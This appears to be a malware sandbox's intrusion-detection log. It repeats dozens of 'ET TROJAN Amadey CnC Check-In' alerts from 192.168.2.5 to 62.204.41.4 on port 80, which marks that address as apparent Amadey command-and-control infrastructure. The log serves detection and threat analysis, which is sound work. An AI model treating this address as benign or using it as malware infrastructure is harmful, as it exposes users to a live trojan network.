SID:	2027700
Source Port:	50286
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449797802027700 02/07/23-19:57:31.010574
SID:	2027700
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450032802027700 02/07/23-19:58:35.551488
SID:	2027700
Source Port:	50032
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449740802027700 02/07/23-19:57:15.662783
SID:	2027700
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449994802027700 02/07/23-19:58:24.905756
SID:	2027700
Source Port:	49994
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450121802027700 02/07/23-19:58:59.277722
SID:	2027700
Source Port:	50121
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450162802027700 02/07/23-19:59:11.945539
SID:	2027700
Source Port:	50162
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450375802027700 02/07/23-20:00:10.441776
SID:	2027700
Source Port:	50375
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450073802027700 02/07/23-19:58:47.629161
SID:	2027700
Source Port:	50073
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449900802027700 02/07/23-19:57:59.126282
SID:	2027700
Source Port:	49900
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449941802027700 02/07/23-19:58:11.058629
SID:	2027700
Source Port:	49941
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450217802027700 02/07/23-19:59:27.889673
SID:	2027700
Source Port:	50217
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449953802027700 02/07/23-19:58:13.951278
SID:	2027700
Source Port:	49953
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449944802027700 02/07/23-19:58:11.828444
SID:	2027700
Source Port:	49944
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450119802027700 02/07/23-19:58:58.794403
SID:	2027700
Source Port:	50119
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449855802027700 02/07/23-19:57:48.404554
SID:	2027700
Source Port:	49855
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450306802027700 02/07/23-19:59:51.473442
SID:	2027700
Source Port:	50306
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450036802027700 02/07/23-19:58:36.277046
SID:	2027700
Source Port:	50036
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450208802027700 02/07/23-19:59:25.676246
SID:	2027700
Source Port:	50208
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449769802027700 02/07/23-19:57:21.585123
SID:	2027700
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449938802027700 02/07/23-19:58:10.348630
SID:	2027700
Source Port:	49938
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450220802027700 02/07/23-19:59:28.638484
SID:	2027700
Source Port:	50220
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450401802027700 02/07/23-20:00:16.704967
SID:	2027700
Source Port:	50401
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450391802027700 02/07/23-20:00:14.311492
SID:	2027700
Source Port:	50391
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450303802027700 02/07/23-19:59:50.704498
SID:	2027700
Source Port:	50303
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450045802027700 02/07/23-19:58:38.414558
SID:	2027700
Source Port:	50045
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449883802027700 02/07/23-19:57:54.965082
SID:	2027700
Source Port:	49883
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450051802027700 02/07/23-19:58:39.861264
SID:	2027700
Source Port:	50051
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450299802027700 02/07/23-19:59:49.758751
SID:	2027700
Source Port:	50299
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449916802027700 02/07/23-19:58:03.032699
SID:	2027700
Source Port:	49916
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450134802027700 02/07/23-19:59:04.959509
SID:	2027700
Source Port:	50134
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449785802027700 02/07/23-19:57:28.117998
SID:	2027700
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450388802027700 02/07/23-20:00:13.583065
SID:	2027700
Source Port:	50388
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449972802027700 02/07/23-19:58:18.490991
SID:	2027700
Source Port:	49972
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450106802027700 02/07/23-19:58:55.697715
SID:	2027700
Source Port:	50106
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449966802027700 02/07/23-19:58:17.026384
SID:	2027700
Source Port:	49966
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450420802027700 02/07/23-20:00:23.363085
SID:	2027700
Source Port:	50420
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450017802027700 02/07/23-19:58:31.793987
SID:	2027700
Source Port:	50017
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449712802027700 02/07/23-19:57:09.572156
SID:	2027700
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449801802027700 02/07/23-19:57:31.978610
SID:	2027700
Source Port:	49801
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449925802027700 02/07/23-19:58:07.476078
SID:	2027700
Source Port:	49925
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450236802027700 02/07/23-19:59:32.439969
SID:	2027700
Source Port:	50236
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449842802027700 02/07/23-19:57:41.717333
SID:	2027700
Source Port:	49842
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449753802027700 02/07/23-19:57:18.413042
SID:	2027700
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450331802027700 02/07/23-19:59:57.512462
SID:	2027700
Source Port:	50331
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449699802027700 02/07/23-19:57:03.880243
SID:	2027700
Source Port:	49699
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450372802027700 02/07/23-20:00:09.704797
SID:	2027700
Source Port:	50372
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450461802027700 02/07/23-20:00:32.989437
SID:	2027700
Source Port:	50461
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449772802027700 02/07/23-19:57:22.305855
SID:	2027700
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450188802027700 02/07/23-19:59:18.207900
SID:	2027700
Source Port:	50188
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450023802027700 02/07/23-19:58:33.280642
SID:	2027700
Source Port:	50023
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450064802027700 02/07/23-19:58:44.287580
SID:	2027700
Source Port:	50064
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450277802027700 02/07/23-19:59:44.403140
SID:	2027700
Source Port:	50277
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450319802027700 02/07/23-19:59:54.594853
SID:	2027700
Source Port:	50319
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450147802027700 02/07/23-19:59:08.302721
SID:	2027700
Source Port:	50147
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450151802027700 02/07/23-19:59:09.287465
SID:	2027700
Source Port:	50151
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449979802027700 02/07/23-19:58:20.181959
SID:	2027700
Source Port:	49979
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450439802027700 02/07/23-20:00:27.911911
SID:	2027700
Source Port:	50439
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449921802027700 02/07/23-19:58:04.595004
SID:	2027700
Source Port:	49921
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450390802027700 02/07/23-20:00:14.048984
SID:	2027700
Source Port:	50390
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450068802027700 02/07/23-19:58:46.433814
SID:	2027700
Source Port:	50068
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450424802027700 02/07/23-20:00:24.325922
SID:	2027700
Source Port:	50424
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450246802027700 02/07/23-19:59:34.827639
SID:	2027700
Source Port:	50246
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449743802027700 02/07/23-19:57:16.382887
SID:	2027700
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449771802027700 02/07/23-19:57:22.069473
SID:	2027700
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449899802027700 02/07/23-19:57:58.885147
SID:	2027700
Source Port:	49899
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450301802027700 02/07/23-19:59:50.234623
SID:	2027700
Source Port:	50301
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450279802027700 02/07/23-19:59:44.920542
SID:	2027700
Source Port:	50279
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450010802027700 02/07/23-19:58:30.047946
SID:	2027700
Source Port:	50010
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450362802027700 02/07/23-20:00:07.266629
SID:	2027700
Source Port:	50362
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450123802027700 02/07/23-19:58:59.760627
SID:	2027700
Source Port:	50123
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449838802027700 02/07/23-19:57:40.748973
SID:	2027700
Source Port:	49838
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450184802027700 02/07/23-19:59:17.230713
SID:	2027700
Source Port:	50184
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450380802027700 02/07/23-20:00:11.655903
SID:	2027700
Source Port:	50380
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450457802027700 02/07/23-20:00:31.981578
SID:	2027700
Source Port:	50457
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450105802027700 02/07/23-19:58:55.457749
SID:	2027700
Source Port:	50105
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449700802027700 02/07/23-19:57:04.269931
SID:	2027700
Source Port:	49700
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449856802027700 02/07/23-19:57:48.633799
SID:	2027700
Source Port:	49856
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450429802027700 02/07/23-20:00:25.500722
SID:	2027700
Source Port:	50429
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449833802027700 02/07/23-19:57:39.543463
SID:	2027700
Source Port:	49833
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450297802027700 02/07/23-19:59:49.266256
SID:	2027700
Source Port:	50297
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450452802027700 02/07/23-20:00:31.039414
SID:	2027700
Source Port:	50452
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450334802027700 02/07/23-19:59:58.221791
SID:	2027700
Source Port:	50334
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449874802027700 02/07/23-19:57:52.779348
SID:	2027700
Source Port:	49874
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449894802027700 02/07/23-19:57:57.677143
SID:	2027700
Source Port:	49894
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449911802027700 02/07/23-19:58:01.794028
SID:	2027700
Source Port:	49911
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450274802027700 02/07/23-19:59:42.509237
SID:	2027700
Source Port:	50274
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450256802027700 02/07/23-19:59:37.251534
SID:	2027700
Source Port:	50256
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450078802027700 02/07/23-19:58:48.869935
SID:	2027700
Source Port:	50078
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449715802027700 02/07/23-19:57:10.319689
SID:	2027700
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449733802027700 02/07/23-19:57:13.945819
SID:	2027700
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450096802027700 02/07/23-19:58:53.262318
SID:	2027700
Source Port:	50096
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450352802027700 02/07/23-20:00:04.891222
SID:	2027700
Source Port:	50352
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450156802027700 02/07/23-19:59:10.481824
SID:	2027700
Source Port:	50156
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450228802027700 02/07/23-19:59:30.531227
SID:	2027700
Source Port:	50228
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449805802027700 02/07/23-19:57:32.928581
SID:	2027700
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450447802027700 02/07/23-20:00:29.817138
SID:	2027700
Source Port:	50447
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450406802027700 02/07/23-20:00:17.910532
SID:	2027700
Source Port:	50406
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449710802027700 02/07/23-19:57:09.099241
SID:	2027700
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450115802027700 02/07/23-19:58:57.838937
SID:	2027700
Source Port:	50115
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450311802027700 02/07/23-19:59:52.679367
SID:	2027700
Source Port:	50311
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450133802027700 02/07/23-19:59:03.417426
SID:	2027700
Source Port:	50133
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450174802027700 02/07/23-19:59:14.839891
SID:	2027700
Source Port:	50174
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449828802027700 02/07/23-19:57:38.323716
SID:	2027700
Source Port:	49828
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450027802027700 02/07/23-19:58:34.302753
SID:	2027700
Source Port:	50027
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450284802027700 02/07/23-19:59:46.139610
SID:	2027700
Source Port:	50284
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

